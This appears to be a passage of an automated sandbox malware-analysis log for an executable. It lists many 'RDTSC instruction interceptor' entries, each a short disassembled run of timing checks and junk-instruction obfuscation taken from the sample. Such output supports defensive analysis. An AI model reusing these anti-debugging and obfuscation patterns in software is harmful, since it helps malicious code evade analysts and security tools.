                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112D697 second address: 112D6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add esi, dword ptr [ebp+122D2BE5h] 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D2429h], edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FD09CB0C7E8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jc 00007FD09CB0C7FEh 0x0000003c jmp 00007FD09CB0C7F8h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112F409 second address: 112F413 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112F413 second address: 112F41F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD09CB0C7EEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112F41F second address: 112F429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D7F78 second address: 10D7F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D7F83 second address: 10D7F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D7F89 second address: 10D7FA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D7FA5 second address: 10D7FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D7FAB second address: 10D7FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112DEF9 second address: 112DEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112DEFD second address: 112DF03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1133879 second address: 11338EB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FD09CF151B8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 sub bh, 00000032h 0x0000002b or dword ptr [ebp+122D2312h], eax 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FD09CF151B8h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d push 00000000h 0x0000004f movzx ebx, cx 0x00000052 jmp 00007FD09CF151C4h 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11338EB second address: 113390B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD09CB0C7F1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1132972 second address: 11329F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FD09CF151B6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FD09CF151BFh 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FD09CF151B8h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 cmc 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f jmp 00007FD09CF151C0h 0x00000044 mov eax, dword ptr [ebp+122D16A5h] 0x0000004a push FFFFFFFFh 0x0000004c call 00007FD09CF151C4h 0x00000051 sub dword ptr [ebp+122D36FAh], edi 0x00000057 pop ebx 0x00000058 nop 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d pop eax 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1134AC8 second address: 1134ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113585F second address: 1135865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1135865 second address: 113588E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007FD09CB0C7F9h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1135A46 second address: 1135A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151C9h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f ja 00007FD09CF151B6h 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11379B7 second address: 11379D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FD09CB0C7F4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FD09CB0C7E6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1136B83 second address: 1136B96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1136B96 second address: 1136B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1136B9C second address: 1136BAB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1136BAB second address: 1136BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1136BAF second address: 1136BB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1136BB5 second address: 1136BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11389B7 second address: 1138A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FD09CF151C4h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FD09CF151B8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a add ebx, dword ptr [ebp+122D31B7h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007FD09CF151B8h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c mov edi, dword ptr [ebp+122D2CDDh] 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 pop ecx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1138A25 second address: 1138A37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1138A37 second address: 1138A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD09CF151C8h 0x00000008 jmp 00007FD09CF151BAh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD09CF151BBh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1138A6F second address: 1138A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1138A73 second address: 1138A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1137C2D second address: 1137C33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1138A79 second address: 1138A7E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1137C33 second address: 1137C45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FD09CB0C7E6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1137C45 second address: 1137C65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007FD09CF151B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1139B56 second address: 1139B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1139B5B second address: 1139B65 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CF151BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1138BB5 second address: 1138BBA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113BCAD second address: 113BCB7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113BCB7 second address: 113BCD9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD09CB0C7ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD09CB0C7EDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113BCD9 second address: 113BCDF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113DDB2 second address: 113DDE4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FD09CB0C7F9h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD09CB0C7EDh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1140C2A second address: 1140C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151C8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1140C46 second address: 1140C86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+12455E3Dh], edi 0x00000014 mov edi, dword ptr [ebp+122D3B0Bh] 0x0000001a push 00000000h 0x0000001c jns 00007FD09CB0C7ECh 0x00000022 push 00000000h 0x00000024 mov ebx, dword ptr [ebp+122D2CA5h] 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113BEA3 second address: 113BEA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113BEA9 second address: 113BEC5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CB0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007FD09CB0C7F4h 0x00000013 pushad 0x00000014 jl 00007FD09CB0C7E6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113CF11 second address: 113CF2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007FD09CF151D0h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD09CF151BEh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113CF2F second address: 113CF33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113EF1B second address: 113EF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113EF1F second address: 113EFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FD09CB0C7E8h 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FD09CB0C7E8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f sub ebx, 3367FDF2h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c or dword ptr [ebp+12455EA6h], eax 0x00000042 mov eax, dword ptr [ebp+122D1145h] 0x00000048 jg 00007FD09CB0C7EBh 0x0000004e cld 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ecx 0x00000054 call 00007FD09CB0C7E8h 0x00000059 pop ecx 0x0000005a mov dword ptr [esp+04h], ecx 0x0000005e add dword ptr [esp+04h], 00000016h 0x00000066 inc ecx 0x00000067 push ecx 0x00000068 ret 0x00000069 pop ecx 0x0000006a ret 0x0000006b call 00007FD09CB0C7EEh 0x00000070 stc 0x00000071 pop edi 0x00000072 mov bh, ch 0x00000074 nop 0x00000075 jng 00007FD09CB0C7EEh 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113FEB5 second address: 113FEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FD09CF151B6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113FEC7 second address: 113FED1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113FED1 second address: 113FED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113FED5 second address: 113FED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113FED9 second address: 113FF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, 0A849BE1h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 add dword ptr [ebp+12453B00h], esi 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push ebx 0x00000022 and bx, F730h 0x00000027 pop edi 0x00000028 mov eax, dword ptr [ebp+122D00DDh] 0x0000002e movsx edi, di 0x00000031 push FFFFFFFFh 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FD09CF151B8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D3315h], ebx 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1141DB0 second address: 1141DB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1146D05 second address: 1146D0B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1146D0B second address: 1146D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1146D10 second address: 1146D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FD09CF151B6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD09CF151C6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c jo 00007FD09CF151CDh 0x00000022 pushad 0x00000023 push edx 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 114B4EB second address: 114B4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 114B4F1 second address: 114B4F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10DEC67 second address: 10DEC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 114AEE6 second address: 114AEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 114AEEC second address: 114AEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 114AEF1 second address: 114AF0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FD09CF151B6h 0x00000009 js 00007FD09CF151B6h 0x0000000f jmp 00007FD09CF151BAh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 114F965 second address: 114F980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7F7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115100C second address: 1151016 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1151016 second address: 115101B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 115101B second address: 1151021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1151021 second address: 1151029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10EE025 second address: 10EE04E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C1h 0x00000007 jmp 00007FD09CF151C0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10EE04E second address: 10EE054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10EE054 second address: 10EE058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10EE058 second address: 10EE062 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD09CB0C7E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10EE062 second address: 10EE07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007FD09CF151BEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11566D9 second address: 11566DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11566DD second address: 11566EF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FD09CF151BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
